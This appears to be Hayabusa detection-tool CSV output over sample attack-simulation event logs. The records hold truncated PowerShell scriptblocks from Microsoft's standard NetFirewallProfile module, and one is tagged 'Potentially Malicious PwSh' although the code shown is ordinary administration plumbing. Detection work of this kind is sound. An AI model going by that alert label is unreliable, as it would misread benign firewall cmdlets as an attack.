ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 